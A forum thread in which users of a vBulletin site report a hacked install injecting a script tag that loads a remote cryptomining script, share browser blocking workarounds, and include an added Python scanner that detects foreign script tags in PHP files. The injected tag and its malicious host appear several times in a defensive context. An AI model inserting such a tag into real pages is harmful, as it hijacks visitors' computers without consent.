
Thread: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

  1. #1

    ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    ThongKing,

    Lately while using the site, I've noticed that my laptop fans would spin so much that it would practically hover.

    I dug into it for a bit and noticed that there's a bit of javascript being loaded on (almost) every page that causes the CPU to spike to 100%. I THINK the script is actually trying to mine bitcoin on each user's machine, but I haven't looked into what it's doing.

    There's a snippet at the end of many of the php files that run the site that looks like:

    Code:
    <script src="http://absenteb.beget.tech/jafdhgkdasjfhguerh.js"></script>
    This causes the "jafdhgkdasjfhguerh.js" javascript file to be loaded by a user's browser and causes serious issues for every user of the site.

    If you google that script name: "jafdhgkdasjfhguerh", you will see numerous reports citing this script as a malicious script that should be removed.

    So yes - the site has been hacked and this javascript snippet is causing major issues with users' computers.

    Please remove it! And if you need help removing it, I'm offering my services!


    In the meantime, I'm an advanced user and I've blocked all requests from my browser to the api.gearch.info URL, and things are operating as normal for me. But others probably don't know how to do that.

    So ThongKing (or any other site administrator), please help us!
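
The injected tag described in the post above sits at the end of many PHP files. As an added example (not part of the original thread and not the site's own code), this read-only Python scan lists every `.php` file that loads a script from a host outside an allow-list and flags tags on the file's last non-blank line. The allow-list entry, the function names and the sample webroot are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from; adjust per site.
ALLOWED_HOSTS = frozenset({"ajax.googleapis.com"})

SCRIPT_SRC = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def find_foreign_scripts(webroot, allowed_hosts=ALLOWED_HOSTS):
    """Return (file, line, host, is_last_line) for each <script src> in a
    .php file that loads from a host outside allowed_hosts. Read-only:
    is_last_line marks tags on the last non-blank line (appended injection)."""
    findings = []
    for path in sorted(Path(webroot).rglob("*.php")):
        lines = path.read_text(encoding="utf-8", errors="replace").splitlines()
        last = max((i for i, l in enumerate(lines, 1) if l.strip()), default=0)
        for lineno, line in enumerate(lines, 1):
            for src in SCRIPT_SRC.findall(line):
                try:
                    host = urlparse(src).hostname  # None for relative paths
                except ValueError:  # malformed URL, no host to attribute
                    continue
                if host and host not in allowed_hosts:
                    findings.append((path.relative_to(webroot).as_posix(),
                                     lineno, host, lineno == last))
    return findings


def demo():
    """Scan a constructed three-file webroot (sample data, not the real site)."""
    samples = {
        "index.php": '<?php include "global.php"; ?>\n'  # injected tag appended
                     '<script src="http://absenteb.beget.tech/jafdhgkdasjfhguerh.js"></script>\n',
        "faq.php": '<script src="clientscript/vbulletin.js"></script>\n',  # local
        "forum/showthread.php": '<script src="https://ajax.googleapis.com/x.js"></script>\n',
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            target = Path(root, name)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return find_foreign_scripts(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Every file it reports still needs a manual review against a known-good copy of the forum software, since the tag got there through some other change to the server that the scan does not identify.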

  3. #2

    Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    I'm so glad you've found this. I had no idea what was causing my laptop to suddenly go nuts, but glad to now know.

  5. #3
    Administrator ThongKing (Join Date: Mar 2014; Location: London; Posts: 3,227)

    Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    Thanks for letting me know. Any idea how to get rid of it from a vBulletin site?

    Had a quick google but my tech skills aren't great.

    If not I will have to hire a freelance guy. Expensive though ***Sigh*** Why can't things ever be straightforward

  7. #4

    Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    Hey,
    any news on this topic?
    It's indeed very annoying...
    Or gstringaddict, do you have any advice on how to block the requests?

  9. #5

    Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    mojo, et al.

    I've DMed ThongKing saying that I am willing to assist in fixing this problem and he has not responded yet. I'm hopeful that I can get access and fix this problem once and for all.

    In the meantime, here's a fairly easy solution for blocking the malicious script from running:

    This is for Google Chrome

    1. First click on the menu (three dots) at the top-right of the browser and select More Tools -> Developer Tools.
    2. This opens up the Developer Tools box. Now click on the menu (three dots) at the top-right of the Developer Tools box and select More tools -> Request blocking.
    3. This will open up the Request blocking menu. Check the Enable request blocking selection, then click the + to add a new pattern. Enter api.gearch.info into the box and click Add.
    4. Now if you refresh the whaletail-forum page, or navigate to the site, you should see this type of activity in the Network tab of the Developer Tools, where requests to the api.gearch.info domain are being blocked successfully.


    A couple of caveats:
    • This will only work while the Developer tools menu is open and the request blocking check is checked.
    • If you have multiple tabs open, you must perform this on each tab (the request blocking feature only applies to the current tab).


    mojo, let me know if you run into any issues with this and I'll gladly help.

  11. #6

    Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    Thanks a lot gstringaddict!

    Your solution led me in the right direction!

    I'm using Firefox and couldn't find a "Request blocking" tool there (although that doesn't mean that it doesn't exist...).
    However, you can use an extension, e.g. "Request Blocker" or "Adblock Plus".

    For the "Request Blocker" you just have to add the URL "http://absenteb.beget.tech/jafdhgkdasjfhguerh.js".
    For "Adblock Plus" you have to create your own filter list in the advanced settings and include the same URL "http://absenteb.beget.tech/jafdhgkdasjfhguerh.js"

    Solves the problem with high CPU load for me, and I don't have to have the developer tools open, and it works for several open tabs.

  13. #7

    Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    To say thanks to the people that know wtf is wrong would be a true understatement - but for us that have no fuckin clue what this all means, when will it be fixed to the point where none of us need to care again?

  15. #8

    Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    I also would like to know when this will be fixed?

  17. #9

    Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    It seems fixed now?

